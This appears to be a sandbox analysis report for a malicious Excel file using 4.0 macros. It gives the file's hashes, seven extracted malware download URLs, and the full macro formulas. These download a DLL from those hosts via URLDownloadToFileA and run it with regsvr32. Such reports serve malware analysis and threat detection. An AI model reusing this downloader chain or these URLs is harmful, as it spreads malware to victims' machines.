Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
8d15b901b4bef6537f63956b7c7a924c2a0a3708c1af23807ec28c521bb6e956
-
Size
20KB
-
MD5
0b2bd21912e427436270ee0de2a61ceb
-
SHA1
402434271af15eb91696d1d095e0867cbea5c8a9
-
SHA256
8d15b901b4bef6537f63956b7c7a924c2a0a3708c1af23807ec28c521bb6e956
-
SHA512
5233486a963e06fef59f3b9020864ba1be96f63d100a4b37c9a631d3ba9345a6ebf4854cf496648367052c3237bd716c7663daea90e5f12b94819efa8e709165
-
SSDEEP
384:a/Vb1GNjU5o4CGzPd6ZIw8R3Kb5CzgObff9kC+xbX7zJBq1:atINAo4FLkCBn9kC+xbLzJy
Malware Config
Extracted
http://antaoco.com/wp-admin/5WaIjOuHnUj/
http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/
http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/
http://andrewpharma.com/wp-includes/WqgKtKrYJM/
http://amkltd.co.uk/amk/IPuhx/
http://gees.com.pl/geessw/2YmxITo6/
http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://antaoco.com/wp-admin/5WaIjOuHnUj/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amakpost.com/assets/IaeePiSroWtpfZ8uURa/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anat-bar.co.il/cgi-bin/UNS6bRMcF4pOTf/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/WqgKtKrYJM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amkltd.co.uk/amk/IPuhx/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gees.com.pl/geessw/2YmxITo6/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.bridgeaustria.at/archive/V27DbIDKqIWeaAPMD/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
8d15b901b4bef6537f63956b7c7a924c2a0a3708c1af23807ec28c521bb6e956